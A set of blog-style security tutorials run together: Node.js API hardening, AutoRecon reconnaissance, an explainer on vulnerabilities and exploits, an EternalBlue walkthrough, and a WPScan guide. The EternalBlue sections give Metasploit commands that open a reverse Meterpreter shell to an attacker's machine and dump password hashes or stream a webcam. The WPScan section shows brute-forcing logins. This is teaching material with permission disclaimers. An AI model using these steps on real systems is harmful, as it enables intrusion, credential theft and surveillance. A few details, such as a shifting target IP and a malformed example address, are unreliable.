Maybe you’ve heard about SQL injection, brute force attacks, or data leaks.

But here’s the thing: it’s not just about big hacks. Even small gaps in your API can lead to big problems. And no one wants to get that “your data’s been exposed” message.

In this article, I’ll walk you through seven ways to harden your Node.js API.

These are practical tips you can apply right away. I’ll keep the code examples simple and the language even simpler. Let’s get into it.

1. Use Environment Variables

Storing sensitive data like database credentials, API keys, or JWT secrets directly in your code is risky. If your code ends up in the wrong hands, so does everything else.

Instead, store this data in a .env file and use the dotenv package to access it:

require('dotenv').config();

const dbPassword = process.env.DB_PASSWORD;

Make sure you never commit your .env file. Add it to your .gitignore file to keep it private.

2. Validate All Input

Attackers love user input.

If you don’t check what comes into your API, they’ll sneak in commands, inject code, or crash your app.

The best way to stop them is by validating every piece of input. Use a package like Joi or zod to define what your API expects:

const Joi = require('joi');

const schema = Joi.object({
  username: Joi.string().alphanum().min(3).max(30).required(),
  password: Joi.string().pattern(new RegExp('^[a-zA-Z0-9]{6,30}$')).required()
});
const { error } = schema.validate(req.body);
if (error) {
  return res.status(400).send(error.details[0].message);
}

In the above code, we have defined the exact data type the schema expects. This way, wrong data gets blocked before it reaches your logic or database.

3. Rate Limit Your Endpoints

Bots and brute force attacks work by flooding your server with requests. Once your server reaches it limit, your API will crash.

Set a limit on how often a user can hit your API using middleware like express-rate-limit Here is an example.

const rateLimit = require('express-rate-limit');

const limiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 100 // limit each IP to 100 requests per windowMs
});
app.use('/api/', limiter);

The above code restricts API requests coming from an IP address to 100 per 15 minutes. This is like putting a speed bump in front of a runaway car.

4. Always Use HTTPS

HTTP sends data in plain text. That means anyone between your server and the user can read it. HTTPS encrypts everything. It’s not optional anymore.

If you’re using a platform like Heroku or Vercel, HTTPS is automatic. If you’re self-hosting, you can set it up with services like Let’s Encrypt.

Also, force HTTPS on all incoming traffic. You can use middleware like this:

app.use((req, res, next) => {
  if (req.headers['x-forwarded-proto'] !== 'https') {
    return res.redirect('https://' + req.headers.host + req.url);
  }
  next();
});

Encrypt the ride. Always.

5. Use Helmet to Secure HTTP Headers

HTTP headers are key-value pairs sent in requests and responses over the web. They give extra information about what’s being sent – like who’s sending it, what type it is, how it should be handled, and more.

HTTP headers are small, but they can be powerful tools to protect your app. Helmet is a Node.js middleware that sets secure headers for you.

const helmet = require('helmet');
app.use(helmet());

Helmet helps prevent attacks like cross-site scripting (XSS), clickjacking, and others just by setting the right headers.

One line of code, a big step up in security.

6. Sanitize Data to Prevent Injection Attacks

Injection attacks happen when you blindly trust input and plug it into a command or query.

For example, an attacker might submit a piece of text that turns into a command in your database.

You should sanitize data before it gets to any sensitive function. Libraries like express-mongo-sanitize or xss-clean help clean up malicious input.

const mongoSanitize = require('express-mongo-sanitize');
const xss = require('xss-clean');

app.use(mongoSanitize());
app.use(xss());

This strips out dangerous characters and scripts that could do real damage.

7. Use Strong Authentication and Authorisation

Authentication is about knowing who the user is, and authorisation is about what they can do. You need both, and you need them to be strong.

Use JWT (JSON Web Tokens) or sessions to manage logged-in users. Here’s a quick JWT example:

const jwt = require('jsonwebtoken');

const token = jwt.sign({ id: user._id }, process.env.JWT_SECRET, {
  expiresIn: '1h'
});

Always verify the token before letting a user access protected routes:

const decoded = jwt.verify(token, process.env.JWT_SECRET);

And don’t forget roles. A user who can view data shouldn’t be able to delete it unless they’re supposed to.

Final Thoughts

Security isn’t just a feature – it’s a habit. You can’t do everything all at once, but you can start with a few key changes.

Use environment variables. Validate your inputs. Add rate limiting. Move to HTTPS. Install Helmet. Sanitize everything. Lock down your authentication.

Each of these steps is a small lock on a big door. The more you add, the harder it is for someone to break in. So take a little time now. Your future self and your users will thank you.

For more cybersecurity tutorials, join our newsletter. To learn the basics of Offensive Cybersecurity, check out our Security Starter Course.

Before you touch a single exploit or send a single payload, you need to know what services are running, what ports are open, what technologies are in play, and where the weak spots might be.

This phase is called reconnaissance. It can eat up hours – sometimes even days – if you’re doing it manually.

That’s where Autorecon comes in.

What is AutoRecon?

Autorecon is a tool that automates most of the initial recon work. It’s not a magic box, but it’s close.

Autorecon takes a list of IPs or domain names and runs a series of predefined scans. Then it organizes the output neatly so you don’t waste time parsing through raw Nmap files or rerunning missed commands.

If you’re just starting out with pentesting – whether you’re on your first TryHackMe box or your tenth OSCP practice lab – Autorecon can save you a ton of time. Let’s break down how it works.

What Exactly Does Autorecon Do?

At its core, Autorecon does three things:

1. Runs Nmap scans on each target IP or hostname.

2. Identifies services running on open ports.

3. Runs specific enumeration tools based on those services.

Let’s say you run it against an IP that has ports 22 (SSH), 80 (HTTP), and 139/445 (SMB) open. Autorecon will:

• Use Nmap to check versions and scripts for each port.

• Run nikto or gobuster on port 80.

• Run enum4linux or smbmap on SMB.

• Store everything in organized folders for later review.

That’s what you’d do manually – but faster, cleaner, and without forgetting steps.

How to Use Autorecon

Let’s walk through a quick example. Assume you have a target at 10.129.8.143.

Here’s the basic command:

autorecon 10.129.8.143

That’s it. No flags, no extra setup. Autorecon takes care of the rest. To understand what is going on behind the scenes, let's add the verbosity -v flag.

Here is a sample result.

Behind the scenes, it creates a folder structure like this:

results/
├── 10.129.8.143/
│   ├── scans/
│   │   ├── nmap/
│   │   └── gobuster/
│   ├── reports/
│   └── notes.txt

You’ll find full Nmap outputs, service-specific tool results, and even a place to jot down your own observations. All ready to go.

If you want to scan multiple targets, just pass a list:

autorecon targets.txt

Once Autorecon completes a scan, go to the results/<IP>/scans/ folder. Start with the Nmap outputs.

Look for open ports and services:

• Port 80 open? Check gobuster and nikto outputs in the HTTP folder.

• SMB ports open? Look in the enum4linux and smbmap results to find shared drives or user info.

• FTP anonymous login allowed? Use that access to explore directories.

These findings will give you the next steps – like browsing a web service, crafting a payload, or checking for known exploits.

Why It’s a Big Deal for Beginners

If you’re new to pentesting, one of the hardest parts is remembering everything you’re supposed to check. You pop open a port, and you think:

• “Wait… Should I run enum4linux on this?”

• “What was that flag for aggressive Nmap scanning again?”

• “Did I already check this web service with nikto?”

Autorecon takes that mental load off your shoulders. You can focus on analysis, not babysitting scans.

And here’s another benefit: it helps you learn the process.

While Autorecon automates recon, it shows you every tool and command it runs. You can open the raw output, read the flags, and understand why it ran those scans.

Example: You’ll see it runs nmap -sV -sC for version detection and scripts. This helps beginners understand which scans map to which services and why they matter.

As it runs, you’ll see all the tools and commands it’s using. You can look at the raw results, see what worked, and gradually build your own workflow.

What It Scans (By Default)

Here’s a quick overview of what Autorecon runs based on port and service:

Nmap:

• Quick scan

• Full TCP port scan

• Service/version detection

• NSE scripts

HTTP/HTTPS:

• gobuster (directory brute-forcing)

• nikto (vulnerability scanner)

• whatweb (tech detection)

SMB:

• enum4linux-ng

• smbmap

• Nmap SMB scripts

FTP:

• Anonymous login check

• Nmap FTP scripts

SSH:

• Banner grab

• SSH version check

And that’s just a slice. It handles other services too, like MySQL, SNMP, SMTP, and even RPC.

When Autorecon Is Most Useful

Autorecon shines in certain situations:

• Training labs: You get a clear view of your target with minimal setup.

• OSCP preparation: It runs the exact recon tools you’ll need to use on the OSCP exam.

• Time-limited pentests: When you need to hit multiple targets fast, Autorecon keeps your output consistent and saves you from retyping everything.

But it’s not just about speed. It’s about being thorough. With manual scanning, it’s easy to miss something small. Autorecon doesn’t forget.

What Autorecon Doesn’t Do

Autorecon isn’t an exploit tool. It doesn’t hack anything for you. It doesn’t guess credentials or bypass login pages.

It’s focused purely on reconnaissance. That means you still have to:

• Review scan results

• Analyze web services manually (for example, browse the site, test inputs)

• Decide which exploits or payloads to run

Also, it can be noisy. If you’re on a real engagement where stealth matters, some scans might raise alarms. In that case, you’d want to run more controlled commands manually.

Tips for Using Autorecon Effectively

Use flags to control scans:
To increase verbosity and skip previously scanned hosts:

autorecon -v --only-scans-dir 10.129.8.143

Customize wordlists for better results:
By default, Autorecon uses small wordlists. You can improve this:

autorecon --dirbuster.wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt 10.129.8.143

This makes directory brute-forcing more effective, especially on web targets.

Don’t skip the output: Read the Nmap files, check the HTML reports. Tools don’t think like humans. You still have to connect the dots.

Final Thoughts

Autorecon doesn’t replace your skills – but it helps supercharge them. Instead of spending 30 minutes typing out scan commands, you can run one command and start analyzing in minutes. This helps beginners stay focused, and it helps pros save time.

So if you’re tired of rerunning the same Nmap scans over and over, or you just want cleaner results and fewer mistakes, let Autorecon do the heavy lifting – so you can focus on the part that really matters: breaking stuff.

For more cybersecurity tutorials, join our newsletter. To learn the basics of Offensive Cybersecurity, check out our Security Starter Course.

What Are Vulnerabilities?

A vulnerability is a flaw in software or hardware that attackers can exploit. These flaws can range from weak passwords to outdated software.

For example, if you use default credentials when setting up a web server, you are creating a vulnerability. Attackers can look up the default login details in documentation and gain access to your server.

One of the most common vulnerabilities is outdated software. If you neglect to update your systems, they become easy targets.

Security updates exist for a reason — they patch known vulnerabilities. If you don’t apply these updates, your system remains vulnerable to known attacks.

What are Exploits?

An exploit is a technique or code that takes advantage of a vulnerability.

If an attacker finds a system with a weak password, they can use a brute-force attack to guess the password. In this case, the weak password is the vulnerability, and brute-forcing is the exploit.

In many cases, exploits are pre-written scripts that automate attacks. For example, an exploit for a vulnerable web application might allow an attacker to gain administrator access without a password.

Cybercriminals often share these exploits online, making it easy for even inexperienced attackers to compromise systems.

Real-World Examples of Vulnerabilities and Exploits

Several well-known vulnerabilities have led to massive cyberattacks. Here are a few examples:

EternalBlue and WannaCry

EternalBlue was a Windows Server Message Block (SMB) protocol vulnerability.

Attackers exploited it to spread the WannaCry ransomware, which infected computers worldwide in 2017. This attack was so damaging because many organizations failed to update their Windows systems.

Heartbleed

This was a vulnerability in OpenSSL, a widely used encryption library. Attackers could exploit Heartbleed to steal sensitive data from servers, including passwords and encryption keys.

BlueKeep

BlueKeep was a vulnerability in the Remote Desktop Protocol (RDP) that allowed attackers to take full control of a system remotely. If exploited, it could let malware spread across networks without user interaction.

Zero-Day Exploits: The Most Dangerous Threat

A zero-day exploit targets a vulnerability that has no known patch.

This means that even the software developer is unaware of the flaw when an attacker discovers it. Zero-day exploits are particularly dangerous because they give attackers a head start before a fix is released.

For example, if a critical vulnerability is found in a popular operating system, cybercriminals can develop exploits before users have a chance to update their systems.

This makes it essential for companies and security teams to monitor for emerging threats and respond quickly.

Where Do Vulnerabilities and Exploits Get Published?

There are public databases where vulnerabilities and exploits are documented. One such database is Exploit Database (exploit-db.com).

Security researchers and ethical hackers contribute to these databases by sharing details of known vulnerabilities and how they can be exploited.

If you scan a server and find that it’s running an old version of Apache, you can search for “Apache 2.7 vulnerabilities” on Exploit Database to see if any exploits exist. This is how security professionals check for risks in their systems.

However, malicious hackers also use these databases to find attack opportunities.

Command-Line Tools for Finding Exploits

If you prefer working in a terminal, there’s a command-line alternative called SearchSploit. This tool allows you to search the Exploit Database without opening a web browser.

SearchSploit comes pre-installed in security-focused operating systems like Kali Linux and Parrot OS.

To use it, you simply type:

searchsploit eternalblue

This command will return a list of known exploits for the EternalBlue vulnerability.

But what if you don’t know the name of a specific vulnerability? SearchSploit allows you to search more broadly. You can list known vulnerabilities for a particular software or service by using keywords. For example, to check for vulnerabilities related to Apache, you can run:

searchsploit apache

This will display a list of exploits related to Apache servers.

Additionally, you can use the -w flag to open exploit references in a web browser:

searchsploit -w apache

SearchSploit is a powerful tool that helps you quickly find and test known vulnerabilities.

Automating Exploitation with Metasploit

Finding and exploiting vulnerabilities manually can be time-consuming. This is where Metasploit comes in.

Metasploit is a powerful framework for penetration testing and security research. It automates many aspects of exploitation, from scanning for vulnerabilities to gaining access to a system.

Metasploit consists of:

• Exploits – Code designed to take advantage of specific vulnerabilities.

• Payloads – Malicious code that runs on a target system after a successful exploit.

• Auxiliary Modules – Tools for scanning, fingerprinting, and reconnaissance.

Let’s say an ethical hacker wants to test whether a machine is vulnerable to EternalBlue (MS17-010), a well-known Windows exploit.

Step 1: Open Metasploit

First, launch the Metasploit Framework by running:

msfconsole

Step 2: Search for the EternalBlue Exploit

To find available exploits, we can search within Metasploit:

search eternalblue

This returns a list of available modules related to EternalBlue.

The main exploit module is:

exploit/windows/smb/ms17_010_eternalblue

Step 3: Select and Use the Exploit

Now, they load the module:

use exploit/windows/smb/ms17_010_eternalblue

Step 4: Set the Target IP Address

The hacker sets the target machine’s IP address:

set RHOSTS 192.168.1.10

Step 5: Choose a Payload

They select a payload that will open a reverse shell on the target:

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5   # The attacker's machine
set LPORT 4444          # The port to listen on

Step 6: Launch the Exploit

Finally, they execute the attack:

exploit

If successful, this provides a Meterpreter shell, allowing full control over the target system.

Using Metasploit, an attacker can scan a system for vulnerabilities, select an exploit, choose a payload, and execute the attack — all in a few simple commands.

This is why both ethical hackers and cybercriminals widely use Metasploit. Here is a full tutorial on Metasploit if you’d like to know more about how you can use it as an ethical hacker.

How to Stay Protected?

Understanding vulnerabilities and exploits is the first step in defending against cyber threats. Here are some key strategies to protect yourself:

1. Keep software updated — Install security patches as soon as they are released.

2. Use strong passwords — Avoid using default or weak passwords. Implement multi-factor authentication (MFA) where possible.

3. Scan your systems regularly — Use tools like Nessus or OpenVAS to check for vulnerabilities.

4. Monitor exploit databases — Stay aware of new vulnerabilities that might affect your systems.

5. Use security tools — Firewalls, intrusion detection systems, and endpoint security software can help prevent exploits from succeeding.

Conclusion

Vulnerabilities are weaknesses in software or hardware, while exploits are the methods attackers use to take advantage of them. Some exploits are well-known and documented, while others, like zero-day attacks, appear suddenly and without warning.

By understanding how exploits work and staying vigilant with security updates, you can reduce the risk of becoming a target. Cybersecurity is an ongoing battle, and the best defense is staying informed and proactive.

Join my weekly newsletter to get more cybersecurity tutorials delivered to you every Friday. To learn hands-on offensive cybersecurity in five days, check out my Security Starter course.

This critical Windows exploit played a key role in the widespread WannaCry ransomware attack that affected systems in over 150 countries.

In this article, we’ll walk through how EternalBlue works, how to scan for it, and how to exploit it using Metasploit.

Note*: This is strictly for ethical hacking and penetration testing purposes on systems you own or have explicit permission to test. Do not use these tools on machines where you don’t have permission.*

What Is EternalBlue?

EternalBlue is a dangerous computer exploit developed by the U.S. National Security Agency (NSA). In 2017, a hacking group called the Shadow Brokers leaked it online. Hackers quickly started using it to attack computers worldwide.

EternalBlue takes advantage of a weakness in Windows computers. This weakness is in the SMB (Server Message Block) protocol, which helps computers share files and printers over a network. By exploiting this flaw, hackers can break into a system without needing a password.

One of the most famous cyberattacks using EternalBlue was WannaCry. This was a ransomware attack that spread across the world in May 2017. It infected over 200,000 computers in more than 150 countries, locking up files and demanding payment. Another attack, NotPetya, used EternalBlue to cause billions of dollars in damage.

Now lets look at how a machine vulnerable to EternalBlue can be exploited.

Prerequisites

1. A target Windows system vulnerable to EternalBlue (for example, an unpatched Windows 7 system).

2. An attacking system (often Kali Linux) with Metasploit installed.

3. Familiarity with basic pentesting commands (Nmap, Metasploit, and so on).

Tools You’ll Need

We are going to use two tools in this tutorial.

Nmap (Network Mapper) is a tool used to scan networks and discover devices, open ports, and running services. It helps ethical hackers and system administrators find security weaknesses and map out network structures. Here is a full tutorial on Nmap.

Metasploit is a powerful hacking framework used to test security by finding and exploiting vulnerabilities in computer systems. It includes Meterpreter, an advanced payload that gives hackers remote control over a compromised machine. Here is a full tutorial on Metasploit.

Identify the Target and Check for Open Ports

First, get the IP address of your target machine. In our example, the IP is 10.10.232.162. You’ll want to confirm that SMB (port 445) is open because EternalBlue attacks the SMB service.

nmap -p 445 10.10.232.162

If the port is open, Nmap will report that port 445 is open. That’s your first green light.

Start Metasploit

Open up your terminal and start the Metasploit Framework (you can learn more about Metasploit in my article here if you need a refresher):

msfconsole

Metasploit will load, displaying the number of exploits, auxiliary modules, and payloads available.

Scan for the EternalBlue (MS17–010) Vulnerability

Next, use Metasploit’s built-in scanner for EternalBlue:

search scanner eternalblue

Use the smb_ms17_010 scanner to check for the EternalBlue vulnerability.

use auxiliary/scanner/smb/smb_ms17_010
show options

Set the target’s IP address (RHOSTS) to your Windows machine:

set RHOSTS 10.10.217.189

Then, run the scanner:

run

If the scanner reports that the host is “likely vulnerable” and shows details such as Windows 7 Professional, you’ve confirmed the EternalBlue vulnerability.

Exploit the Vulnerability

Once you know the target is vulnerable, search for the actual EternalBlue exploit module:

search exploit eternalblue

You should see a list of possible exploits. The one we’re interested in is typically labelled something like:

exploit/windows/smb/ms17_010_eternalblue

Use that exploit:

use exploit/windows/smb/ms17_010_eternalblue
show options

Set the target’s IP address again:

set RHOSTS 10.10.217.189

Then check the payload settings. Metasploit often defaults to a Meterpreter payload (for example, windows/x64/meterpreter/reverse_tcp), which is ideal. Confirm that your local IP (LHOST) is correct, so the connection can come back to your machine.

Finally, run the exploit:

run

Meterpreter Shell and Post-Exploitation

If successful, you will land in a Meterpreter shell. Meterpreter is a powerful payload that allows you to:

• Dump password hashes

• Elevate privileges

• Capture webcam streams

• Record microphones, and more.

Here’s a quick look at some Meterpreter commands:

sysinfo         # Displays the target system information
getuid          # Shows the user context you’re running under
hashdump        # Dumps SAM password hashes (requires privilege escalation)
webcam_stream   # Streams from the target’s webcam if available

The EternalBlue exploit is a prime example of how a single unpatched vulnerability can expose a system for takeover.

Understanding its mechanics helps defensive teams patch systems, monitor network traffic for suspicious SMB communications, and create robust response strategies.

Conclusion

EternalBlue remains one of the most notable Windows vulnerabilities, illustrating the importance of patching and cybersecurity hygiene. From scanning with Nmap to exploiting with Metasploit, the process follows a typical penetration testing workflow: scan for holes, identify vulnerabilities, exploit, and escalate.

Hackers use EternalBlue to spread malware, create botnets, and steal data. Cybersecurity experts recommend updating Windows, disabling SMBv1, and using strong firewalls to stay protected.

Microsoft released a patch (a security update) in March 2017 to fix the issue. However, many computers were not updated, making them easy targets for hackers. Even today, some systems remain unpatched and at risk.

For video tutorials on Cybersecurity, check out my YouTube channel. To get some hands on experience with Eternal Blue and similar vulnerabilities, check out this Security Starter course.

So if you run a WordPress site, you’ll need to make sure it’s secure. And this isn’t just a technical task, but is also a key responsibility from several points of view such as brand reputation, data breach, and business continuity.

One tool that stands out in the WordPress ecosystem is WPScan. It’s a security scanner that’s specifically designed for WordPress. It comes with both a paid and free license, according to your needs. It is also pre-installed in Kali Linux distributions.

So whether you’re a seasoned website admin or a website owner looking to improve your site's security, WPScan can help you identify vulnerabilities before attackers exploit them.

Before going ahead, one very important thing: the purpose of this article is to help individuals and organizations strengthen the security of their WordPress websites by effectively utilizing WPScan.

While this tool is incredibly powerful in identifying vulnerabilities, it’s important to emphasize that any unauthorized use of WPScan—such as scanning websites without proper permission—is not only unethical but also illegal.

My goal in sharing this information is to empower site administrators and developers to proactively secure their websites, safeguard their data, and create a safer online environment for everyone.

What we’ll cover:

1. What is WPScan?

2. How to Scan Your WordPress Site Using WPScan

3. What to do with WPScan Results

4. Limitations of WPScan

5. Best Practices for Using WPScan

6. How to Monitor Results Effectively

7. Conclusion

What is WPScan?

WPScan is a command-line tool that helps you identify potential vulnerabilities in your WordPress installation. It’s like a security guard for your website, keeping an eye on outdated plugins, misconfigurations, and other common issues.

What makes WPScan unique is its focus on WordPress. It uses a database maintained by security experts, which is updated regularly to track thousands of known vulnerabilities in WordPress core, plugins, and themes.

What Can WPScan Do?

Here are just a few things WPScan can help you with:

• Detecting outdated WordPress core versions.

• Identifying vulnerabilities in plugins and themes.

• Enumerating users (for example, discovering usernames).

• Testing for weak passwords (using a dictionary attack).

• Finding exposed sensitive files (like backups or debug logs).

Let’s see now the most common commands you can use.

How to Scan Your WordPress Site Using WPScan

1. Basic Scan

A basic scan provides an overview of your WordPress site's security by identifying key vulnerabilities or misconfigurations. It can detect the WordPress core version and flag it if it's outdated, highlighting potential risks like SQL injection or cross-site scripting (XSS) vulnerabilities associated with older versions.

The scan might also reveal publicly accessible backup files (for example, .sql or .zip) or debug files like debug.log, which could expose sensitive information such as database credentials or server paths.

It can flag missing or improperly configured HTTP security headers, such as Strict-Transport-Security (HSTS) or Content-Security-Policy (CSP), which are critical for protecting against protocol downgrade attacks and unauthorized script execution.

Open directories that expose your site's file structure and potentially vulnerable plugins or themes may also be flagged if they are identified in public metadata.

These findings provide a starting point to address fundamental security gaps.

wpscan --url http://yourwebsite.com

This is what you’ll see on your terminal when you run this command:

2. Enumerating Users

User enumeration is a process of identifying usernames on your WordPress site. Knowing these usernames can help attackers target specific accounts for brute-force attacks.

To enumerate users, run:

wpscan --url http://yourwebsite.com --enumerate u

The output will show usernames:

If you find default usernames like admin, you should replace them with something unique and secure.

Here are some best practice for usernames:

• Avoid default names: Replace default usernames like admin or user with something unique and not easily guessable.

• Rename vulnerable usernames: To change a username, you can create a new user with administrator privileges, transfer ownership of posts or content, and then delete the old user.

• Use role-based usernames carefully: Avoid naming accounts after their roles (for example, editor, manager), as these can be easy targets.

• Implement login lockouts: Combine secure usernames with plugins that lock accounts after repeated failed login attempts.

• Enable Two-Factor Authentication (2FA): Adding 2FA ensures that even if a username is guessed, the account remains secure.

3. Checking Plugins and Themes

Plugins and themes can have security issues. WPScan can list all installed plugins and themes, along with any associated vulnerabilities.

For plugins, run this:

wpscan --url http://yourwebsite.com --enumerate p

It’ll have an output like this:

For themes, run this:

wpscan --url http://yourwebsite.com --enumerate t

It’ll have output similar to this:

Look for outdated versions or known vulnerabilities in the results, and update or replace those components immediately.

Let’s look at some common security issues in plugins and themes.

First, we have Cross-Site Scripting (XSS). Insecure input handling in plugins or themes can allow attackers to inject malicious scripts, potentially stealing user information or taking over admin sessions. A poorly secured WordPress site with an XSS vulnerability can allow attackers to steal session cookies, potentially gain unauthorized admin access, inject malicious redirects, take users to phishing sites, display deceptive content, tricking users into providing sensitive information.

There’s also SQL Injection. Poorly written plugins or themes can enable attackers to manipulate database queries, exposing sensitive data or damaging your site. SQL injection vulnerabilities can be exploited to dump sensitive data, bypass authentication, and modify or delete data

Some plugins or themes might include malicious code—intentionally or due to poor security—that grants attackers unauthorized access to your site, known as backdoors. Once installed, a backdoor can grant persistent access, enable arbitrary file uploads, undermine site integrity, and steal sensitive data.

There’s also Remote Code Execution (RCE) – vulnerabilities that allow attackers to execute arbitrary code on your server, often leading to full control of your site or server. Once attackers gain RCE access, they can create admin users, exfiltrate data, launch further attacks, and privilege escalation.

Best Practices:

• Always keep plugins and themes updated to the latest versions.

• Remove any unused or inactive plugins and themes, as these can still pose a risk.

• Ensure plugins and themes are downloaded from trusted, reputable sources and have a history of active maintenance.

• Consider using security plugins to monitor changes to plugin or theme files and detect suspicious activity.

4. Password Testing

WPScan can test for weak passwords by attempting a brute-force attack using a wordlist:

wpscan --url http://yourwebsite.com --passwords /path/to/passwords.txt

and this is the output on your command line:

What is Brute-Forcing?

Brute-forcing is a method attackers use to guess passwords by systematically trying every possible combination until the correct one is found. When combined with a wordlist—a file containing a collection of commonly used passwords—brute-forcing becomes much faster and more efficient.

A typical wordlist might include:

• Simple passwords like 123456, password, and qwerty.

• Common patterns such as Spring2024! or welcome123.

• Leaked passwords from previous data breaches.

By simulating this type of attack, WPScan can identify accounts that use weak passwords, allowing you to address vulnerabilities proactively.

Weak passwords make brute-forcing easier and faster. A short or predictable password might be guessed in seconds, while a longer, complex password with unique elements is exponentially harder to crack.

How to Create Strong Passwords

Strong passwords are your first line of defense against brute-force attacks. Here are key characteristics of strong passwords:

• Length: At least 12–16 characters long.

• Complexity: Use a mix of uppercase and lowercase letters, numbers, and special characters.

• Uniqueness: Avoid reusing passwords across multiple accounts.

• Unpredictability: Avoid dictionary words, common phrases, or personal information like birthdays.

Strategies for Generating Strong Passwords

There are various measures you can take to create strong passwords. First, use a password generator. Tools like LastPass and Bitwarden can create and store highly complex passwords for you.

You should also use pass phrases (instead of just regular passwords). Combine random, unrelated words with numbers and symbols, such as Sky#Tree!Motorbike12.

Finally, avoid patterns that might be easily guessed by an attacker. Don’t use sequential or keyboard patterns like abcdef or qwerty.

Use Tools to Manage Passwords

Managing strong passwords can be challenging. Password managers simplify this by securely storing and autofilling your credentials. Popular options include:

• Bitwarden

• LastPass

These tools also have features like password auditing to detect reused or weak passwords.

Use Two-Factor Authentication (2FA)

Two-factor authentication (2FA) adds an additional layer of security by requiring users to verify their identity through a second factor beyond the password. This can include:

• One-time codes sent via email or SMS.

• App-generated codes from tools like Google Authenticator or Authy.

• Biometric verification, such as fingerprints or facial recognition.

Even if an attacker guesses your password through brute-forcing, 2FA prevents them from accessing your account without secondary verification. This additional step makes brute-forcing impractical, as attackers would also need to compromise your 2FA device or method.

How to Implement 2FA in WordPress

1. Install a WordPress plugin such as Google Authenticator.

2. Require all user accounts, especially administrators, to enable 2FA.

3. Offer backup codes or recovery options in case users lose access to their 2FA device.

4. Test and make sure that 2FA works reliably for all user roles before making it mandatory.

The Importance of Password Hygiene

By using strong passwords and implementing 2FA, you can significantly reduce the effectiveness of brute-force attacks.

WPScan’s password testing feature can help you identify weak credentials. It also underscores the critical need for proactive password hygiene and additional security layers to keep your WordPress site secure.

What to Do with WPScan Results

WPScan reports provide actionable insights into your site’s security. Here’s what you can do with the information:

First, update WordPress core, plugins, and themes: Keep everything updated to patch vulnerabilities.

Second, address configuration issues: Fix misconfigured file permissions, insecure HTTP headers, and other warnings.

Here are a couple of remediation examples you can apply:

• Directory indexing: If WPScan detects open directories, disable directory browsing by adding this line to your .htaccess file:

    Options -Indexes
  

• File permissions: Ensure critical files like wp-config.php are read-only by setting permissions to 440 or 400 using the command:

    chmod 400 wp-config.php
  

You should also harden all user accounts. You can do this in several ways:

• Update weak passwords: Use strong, unique passwords for all user accounts (refer to the password testing section for tips).

• Remove unused accounts: Delete inactive accounts, especially those with administrator privileges.

• Rename predictable usernames: Change usernames like admin to something less obvious.

Make sure you also secure any sensitive files: If WPScan finds exposed files like debug.log, delete or secure them. Delete unnecessary files or old backups.

For files you need to keep, move them to a directory outside the web root. You can also protect files with .htaccess, by blocking access to sensitive files using Deny and Allow rules:

<Files wp-login.php>
    Order Deny,Allow
    Deny from all
    Allow from 123.456.789.000
</Files>

Limitations of WPScan

WPScan is a powerful too, but it does have some limitations. Just be aware of them so you can take other measures to protect your WP sites.

1. Known Vulnerabilities Only

WPScan relies on its database of known vulnerabilities, so it won’t catch zero-day exploits or custom vulnerabilities.

Here are some tips on how you can mitigate this issue:

• Stay informed: Monitor WordPress security blogs, vulnerability databases like CVE or WPVulnDB, and community forums for emerging threats.

• Use a Web Application Firewall (WAF): Tools like Cloudflare or Sucuri can block suspicious activities and attempts to exploit unknown vulnerabilities.

• Conduct manual security reviews: Periodically review your site for unusual behavior or unauthorized changes, particularly in critical files like wp-config.php or your database.

2. No Real-Time Protection

WPScan a diagnostic tool, not a firewall or intrusion detection system. For real-time protection, it’s a good idea to combine WPScan with other tools.

Some steps you can take are:

• Install security plugins: Use specific security plugins to provide continuous monitoring, malware scanning, and firewall protection.

• Monitor activity logs: Set up activity tracking to identify suspicious login attempts, file changes, or unauthorized user actions.

3. Resource-Intensive

Scanning large sites with many plugins and themes can be time-consuming and may impact server performance.

There are various strategies you can adopt to mitigate this such as scheduling scans during low-traffic periods to minimize disruption to site visitors. You can also perform scans on a staging copy of your site rather than directly on the live environment.

4. Learning Curve

As a command-line tool, WPScan can be intimidating for less technical users. However, the documentation is excellent, and with practice, you’ll become proficient.

If the CLI is overwhelming for you, try pairing WPScan with security plugins that offer GUI-based scanning and reporting.

Best Practices for Using WPScan

To get the most out of WPScan, you’ll want to to tailor its usage to your site’s specific needs and establish a robust strategy for monitoring results. Here’s how you can maximize its effectiveness:

Choose the Right Scans for Your Site

WPScan offers a variety of scan options, from basic scans to targeted vulnerability checks for plugins, themes, and user accounts. Choosing the right scans depends on the type of site you manage and the sensitivity of the data it handles.

For small, low-traffic sites:

• Prioritize basic scans to check WordPress core, plugins, and themes for updates and vulnerabilities.

• Run scans monthly or after major updates.

• Use user enumeration (--enumerate u) if you suspect weak passwords or default usernames.

For medium-sized business sites:

• In addition to basic scans, include plugin and theme enumeration (--enumerate p,t) to ensure all components are secure.

• Weekly scans to stay ahead of emerging threats.

• Combine WPScan with activity log plugins to track user actions and file changes.

For high-traffic or e-commerce sites:

• Perform comprehensive scans, including user enumeration (--enumerate u), file enumeration (--enumerate f), and password brute-force testing (if allowed).

• Daily or weekly scans to minimize risk.

• Implement additional measures like 2FA for admin accounts, a web application firewall (WAF), and security headers to reinforce your site.

For sites handling sensitive data:

• Prioritize all available scans, including those for exposed files and configuration vulnerabilities.

• Weekly scans with real-time monitoring via a security plugin.

• Use staging environments to test security settings without affecting production.

Should You Use All Scans?

While it may seem beneficial to use every scan WPScan offers, there are various factors to consider.

First, think about your site’s size and your resources. For smaller sites, running all scans can be overkill and resource-intensive.

You’ll also want to focus on scans that address your site's most likely vulnerabilities. For example, an e-commerce site should prioritize user and payment security over exhaustive file enumeration.

Compliance requirements are also important to take into consideration. If you’re subject to regulations like GDPR, ensure you scan for and address vulnerabilities related to data protection.

How to Monitor Results Effectively

Monitoring WPScan results is important. It helps you fix vulnerabilities, of course, but it also helps you create a system to track changes over time and stay vigilant.

Set Up Reporting

You can save scan results to files using the --output flag:

wpscan --url http://example.com --output /path/to/report.txt

Then review the reports regularly and compare them to previous scans to identify recurring issues or new vulnerabilities.

Create an Action Plan

It’s a good idea to categorize vulnerabilities based on severity (for example, critical, moderate, low).

This allows you to address high-severity issues (like outdated plugins with known exploits) immediately. Then you can schedule lower-priority tasks, such as file permission adjustments or minor configuration changes, for routine maintenance.

Track Trends Over Time

Use tools like spreadsheets or a project management app (for example, Trello, Asana) to log vulnerabilities, fixes, and follow-up actions.

Make sure you analyze recurring issues to identify patterns, such as frequent plugin vulnerabilities, and consider replacing problematic components.

Automate Notifications

If you schedule scans using cron jobs, set up email alerts or notifications to review results without delay.

